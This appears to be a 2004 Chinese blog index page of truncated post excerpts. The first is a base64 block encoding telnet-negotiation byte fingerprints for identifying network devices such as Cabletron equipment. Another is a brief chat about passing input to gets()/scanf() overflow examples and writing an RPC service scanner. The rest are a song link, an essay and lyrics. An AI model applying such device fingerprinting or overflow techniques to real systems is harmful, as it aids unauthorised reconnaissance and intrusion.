MDkgMjcgNDAgNDggMjcgOTEgNDkgNTkgNDkgNzIgMTA4IDExMyAxMTMgMTEzIDExMyAxMTMgMTEz IDExMyAxMTMgMTEzIDExMyAxMTMgMTEzIDExMyAxMTMgMTEzIDExMyAxMTMgMTEzIDExMyAKQ0FC TEVUUk9OIEVNTUUgTG9jYWwgTWFuYWdlbWVudAoKRE86ICAgMjU1IDI1MyAzIDI1NSAyNTEgMSAy NyA5MSA1MCA3NCAyNyA5MSA0OSA1OSA0OSA3MiAyNyA5MSA0OCAxMDkgMjcgOTEgNjMgNTEgMTA4 IDI3IDQwIDQ4IDI3IDkxCkRPTlQ6IDUwIDU5IDUyIDQ4IDcyIDI3IDQwIDY2IDI3IDQwIDQ4IDI3 IDkxIDUwIDU5IDUwIDU2IDcyIDI3IDQwIDY2IDUwIDY5IDUyIDUwIDQ1IDUwIDU1IDMyIDc2CkNB QkxFVFJPTiAyRTQyLTI3IExPQ0FMIE1BTkFHRU1FTlQKCkRPOiAgIDI1NSAyNTMgMyAyNTUgMjUx IDEgMjcgOTEgNTAgNzQgMjcgOTEgNDkgNTkgNDkgNzIgMjcgOTEgNDggMTA5IDI3IDkxIDYzIDUx IDEwOCAyNyAqCkRPTlQ6ICoKcHJvYmFibHkgc29tZSBDQUJMRVRST04KCkRPOiAgIDI1NSAyNTMg MyAyNTUgMjUxIDEgMjU1IDI1MSAzCkRPTlQ6IDI3IDkxIDQ5IDU5IDQ5IDcyIDI3IDkxIDUwIDc1 IDI3IDkxIDUwIDU5IDQ5IDcyIDI3IDkxIDUwIDc1IDI3IDkxIDU Bytes 发表于 02:53 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑两个面 - 2004-10-10 01:05 Lolo MM关于你说的那个gets(),scanf()函数溢出的问题,如何把参数传递过去,我这里有一个比较方便的方法利用pipe函数,建立一个管道.具体看我给回的E-mail.不过话说回来,现在这么老土的实例很少了吧?有点学院派的味道,嗬嗬.^_^ 原先孤陋寡闻,这几天在写RPC服务扫描程序,不知道getrpcbynumber()这个函数,那天在看rpcinfo符号表的时候发现了,找到其源代码看了看,getrpcbynumber(head-.............. Bytes 发表于 01:05 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑米兰米兰 - 2004-10-04 16:57 米兰队歌――米兰米兰（独唱版）经典的足球俱乐部队歌. 下载: http://scacm.512j.com/music/MilanMilanI.mp3 Bytes 发表于 16:57 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑 ZT-保护好你的妻子。保护好爱你的人 - 2004-10-03 05:58 在整个地球上，有60亿人。在这整整60亿人中，只有其中的一个与你朝夕相处。这个人就是你的妻子。这个妻子和你住同一所房子，养同一个孩子，使用同一笔钱的同时吃同一早餐。如果可以，百年后你妻子的名字还将和你约刻在同一块石头上。这块石头的名称叫墓碑，它将记载你，同时也记载你的妻子，它将告诉任何一个目睹此碑的人，别小瞧了你的妻子，.............. Bytes 发表于 05:58 | 阅读全文 | 评论(0) | 引用trackback(0) | 编辑《虫儿飞》 - 2004-10-02 05:38 《虫儿飞》黑黑的天空低垂亮亮的繁星相随虫儿飞虫儿飞你在思念谁天上的星星流泪地上的玫瑰枯萎冷风吹冷风吹只要有你陪虫儿飞花儿睡一双又一对才美不怕天黑只怕心碎不管累不累也不管东南西北